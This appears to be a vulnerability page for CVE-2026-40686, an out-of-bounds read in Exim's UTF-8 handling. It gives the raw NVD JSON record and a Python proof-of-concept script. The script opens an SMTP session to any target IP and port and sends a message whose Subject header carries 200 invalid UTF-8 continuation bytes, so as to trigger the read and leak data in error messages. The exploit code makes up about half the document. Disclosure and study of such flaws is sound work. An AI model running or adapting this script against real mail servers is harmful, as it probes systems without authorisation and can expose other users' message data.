CVE-2026-40686

import socket import sys # PoC for CVE-2026-40686 # Sending malformed UTF-8 headers to trigger out-of-bounds read def send_exploit(target_ip, target_port): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) s.recv(1024) # Receive banner # Construct payload with malformed UTF-8 trailing characters # Using a long sequence of invalid continuation bytes malformed_header = "Subject: " + "\x80" * 200 + "\r\n" payload = ( "EHLO pwn.example.com\r\n" "MAIL FROM: <attacker@local>\r\n" "RCPT TO: <postmaster@local>\r\n" "DATA\r\n" "From: <attacker@local>\r\n" "To: <postmaster@local>\r\n" + malformed_header + "\r\n" "Test body\r\n" ".\r\n" "QUIT\r\n" ) s.send(payload.encode('utf-8')) response = s.recv(4096) print("[*] Payload sent.") print("[*] Response from server:") print(response.decode('utf-8', errors='ignore')) s.close() except Exception as e: print(f"Error: {e}") if __name__ == "__main__": # Usage: python script.py <target_ip> <port> if len(sys.argv) > 2: send_exploit(sys.argv[1], int(sys.argv[2])) else: send_exploit("127.0.0.1", 25)

{"cve": {"id": "CVE-2026-40686", "sourceIdentifier": "[email protected]", "published": "2026-04-30T22:16:25.787", "lastModified": "2026-05-01T17:44:15.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Exim before 4.99.2, when utf8 operators are enabled, there is an out-of-bounds read if large UTF-8 trailing characters are present (malformed UTF-8 header data). Information might be divulged within an error message produced during handling of an unrelated e-mail message."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:exim:exim:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.99.2", "matchCriteriaId": "E48EAA99-95DA-4695-BBEA-16D09AA0A508"}]}]}], "references": [{"url": "https://code.exim.org/exim/exim/commit/f2570bde16fb4d4a1242ff363a4c4eecf6372efc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://exim.org/static/doc/security/CVE-2026-40686.txt", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://exim.org/static/doc/security/cve-2026-04.1/CVE2026-40686.assessment", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/04/30/21", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}]}}